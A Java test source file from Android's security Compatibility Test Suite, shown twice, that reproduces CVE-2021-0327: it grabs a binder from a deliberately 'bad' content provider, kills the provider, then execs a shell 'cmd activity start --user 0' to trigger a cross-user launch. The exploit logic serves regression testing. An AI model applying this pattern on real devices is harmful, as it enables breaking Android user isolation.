tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java - platform/cts - Git at Google

 package android.security.cts.CVE_2021_0327;

 import android.annotation.SuppressLint;
 import android.app.Activity;
 import android.app.AlertDialog;
 import android.net.Uri;
 import android.os.AsyncTask;
 import android.os.Bundle;
 import android.os.Handler;
 import android.os.IBinder;
 import android.os.ParcelFileDescriptor;
 import android.os.ResultReceiver;
 import android.view.View;
 import android.util.Log;
 import java.io.File;
 import java.io.FileDescriptor;
 import java.io.*;
 import java.util.stream.Collectors;
 import java.util.concurrent.TimeUnit;
 import android.os.SystemClock;

 public class OtherUserActivity extends Activity {

     static ParcelFileDescriptor sTakenBinder;
     private static final String TAG = "CVE_2021_0327";
     String errorMessage = null;

     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
         doMakeProviderBad(null);
         SystemClock.sleep(5000);
         doStuff(null);
     }

     public void doMakeProviderBad(View view) {
         new MakeProviderBad().execute();
     }

     private class MakeProviderBad extends AsyncTask<Void, Void, Exception> {

         @Override
         protected Exception doInBackground(Void... voids) {
             try {
                 if (sTakenBinder != null) {
                     sTakenBinder.close();
                     sTakenBinder = null;
                 }

                 Uri uri = getIntent().getClipData().getItemAt(0).getUri();
                 Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null);
                 IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a"));
                 sTakenBinder = iface.takeBinder();
                 if (sTakenBinder == null) {
                     throw new Exception("Failed to find binder of provider");
                 }
                 iface.exit();
             } catch (Exception e) {
                 errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
             }

             return null;
         }

         @Override
         protected void onPostExecute(Exception e) {
         }
     }

     public void doStuff(View view) {
       sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity");
     }

     @SuppressLint("PrivateApi")
     void sendCommand(String... args) {
       String[] command = new String[args.length + 2];
       command[0] = "/system/bin/cmd";
       command[1] = "activity";
       System.arraycopy(args, 0, command, 2, args.length);

       try{
        Runtime.getRuntime().exec(command);
       } catch(Exception e){
         errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
       }
       finally{
         synchronized(CVE_2021_0327.class){
           CVE_2021_0327.testActivityRequested=true;
           CVE_2021_0327.errorMessage = errorMessage;
           CVE_2021_0327.class.notifyAll();
         }
       }
     }
 }
	package android.security.cts.CVE_2021_0327;

	import android.annotation.SuppressLint;
	import android.app.Activity;
	import android.app.AlertDialog;
	import android.net.Uri;
	import android.os.AsyncTask;
	import android.os.Bundle;
	import android.os.Handler;
	import android.os.IBinder;
	import android.os.ParcelFileDescriptor;
	import android.os.ResultReceiver;
	import android.view.View;
	import android.util.Log;
	import java.io.File;
	import java.io.FileDescriptor;
	import java.io.*;
	import java.util.stream.Collectors;
	import java.util.concurrent.TimeUnit;
	import android.os.SystemClock;

	public class OtherUserActivity extends Activity {

	static ParcelFileDescriptor sTakenBinder;
	private static final String TAG = "CVE_2021_0327";
	String errorMessage = null;

	@Override
	protected void onCreate(Bundle savedInstanceState) {
	super.onCreate(savedInstanceState);
	doMakeProviderBad(null);
	SystemClock.sleep(5000);
	doStuff(null);
	}

	public void doMakeProviderBad(View view) {
	new MakeProviderBad().execute();
	}

	private class MakeProviderBad extends AsyncTask<Void, Void, Exception> {

	@Override
	protected Exception doInBackground(Void... voids) {
	try {
	if (sTakenBinder != null) {
	sTakenBinder.close();
	sTakenBinder = null;
	}

	Uri uri = getIntent().getClipData().getItemAt(0).getUri();
	Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null);
	IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a"));
	sTakenBinder = iface.takeBinder();
	if (sTakenBinder == null) {
	throw new Exception("Failed to find binder of provider");
	}
	iface.exit();
	} catch (Exception e) {
	errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
	}

	return null;
	}

	@Override
	protected void onPostExecute(Exception e) {
	}
	}

	public void doStuff(View view) {
	sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity");
	}

	@SuppressLint("PrivateApi")
	void sendCommand(String... args) {
	String[] command = new String[args.length + 2];
	command[0] = "/system/bin/cmd";
	command[1] = "activity";
	System.arraycopy(args, 0, command, 2, args.length);

	try{
	Runtime.getRuntime().exec(command);
	} catch(Exception e){
	errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
	}
	finally{
	synchronized(CVE_2021_0327.class){
	CVE_2021_0327.testActivityRequested=true;
	CVE_2021_0327.errorMessage = errorMessage;
	CVE_2021_0327.class.notifyAll();
	}
	}
	}
	}